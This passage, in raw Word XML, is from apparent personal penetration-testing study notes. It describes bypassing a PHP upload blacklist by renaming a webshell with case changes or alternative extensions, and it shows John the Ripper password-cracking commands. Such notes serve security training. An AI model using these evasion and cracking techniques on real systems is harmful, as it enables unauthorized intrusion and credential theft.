        <w:t xml:space="preserve">Bypassing file extension filters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (9.3.1. Using Executable Files):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 15 shows that we successfully uploaded our text file, so we know that the upload mechanism is not limited to images only. Next, let's attempt to upload the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simple-backdoor.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> webshell used in the previous Learning Unit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5543550" cy="1524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 16: Failed Upload of simple-backdoor.php" id="168" name="image164.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 16: Failed Upload of simple-backdoor.php" id="0" name="image164.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId604"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 16: Failed Upload of simple-backdoor.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16 shows that the web application blocked our upload, stating that PHP files are not allowed and files with PHP file extensions are blacklisted. Since don't know exactly how the filter is implemented, we'll use a trial-and-error approach to find ways to bypass it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D8F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One method to bypass this filter is to change the file extension to a less-commonly used</w:t>
      </w:r>
      <w:hyperlink r:id="rId605">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId606">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PHP file extension</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.phps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This may allow us to bypass simple filters that only check for the most common file extensions, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.phtml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These alternative file extensions were mostly used for older versions of PHP or specific use cases but are still supported for compatibility in modern PHP versions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D90">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way we can bypass the filter is by changing characters in the file extension to upper case. The blacklist may be implemented by comparing the file extension of the uploaded file to a list of strings containing only lower-case PHP file extensions. If so, we can update the uploaded file extension with upper-case characters to bypass the filter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D91">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try the second method, updating our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simple-backdoor.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file extension from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.pHP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After renaming the file either in the terminal or file explorer, we'll upload it via the web form.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 17: Successful Upload of simple-backdoor.pHP" id="267" name="image265.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 17: Successful Upload of simple-backdoor.pHP" id="0" name="image265.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId607"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 17: Successful Upload of simple-backdoor.pHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D93">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This small change allowed us to bypass the filter and upload the file. Let's confirm if we can use it to execute code as we did in the RFI section. The output shows that our file was uploaded to the "uploads" directory, so we can assume there is a directory named "uploads".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D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D98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6py8vu27jg7z" w:id="244"/>
      <w:bookmarkEnd w:id="244"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John The Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can't crack a hash, just try and online hash cracker. Like for the BTRSys2.1 PG Play, the MD5 hash couldn't be cracked on Kali, but an online hash cracker got it (crackstation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to identify what type of hash you have: </w:t>
      </w:r>
      <w:hyperlink r:id="rId608">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">use this website!</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D9F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s4dl5rlby808" w:id="245"/>
      <w:bookmarkEnd w:id="245"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use John The Ripper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "hash.txt" with your file that your hashes are located</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace "Raw-SHA256" with the type of hash you have</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't know the format, just don't include the -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-format</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag and it will guess. HOWEVER, this is often a bad idea. Use</w:t>
      </w:r>
      <w:hyperlink r:id="rId609">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> the website above</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify type of hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show hash.txt or john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--show --format=name_of_format hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output: ?:qwerty789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the password is qwerty789 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">? means no associated username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: is the separator between username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might need to add the "format" flag to specify which result you are showing, since if you use different formats for the same file, then they will each have their own results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, if you can't see the passwords or if you lost the output, you can run this command to check John's internal session files to see what passwords it previous found that were associated with that file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
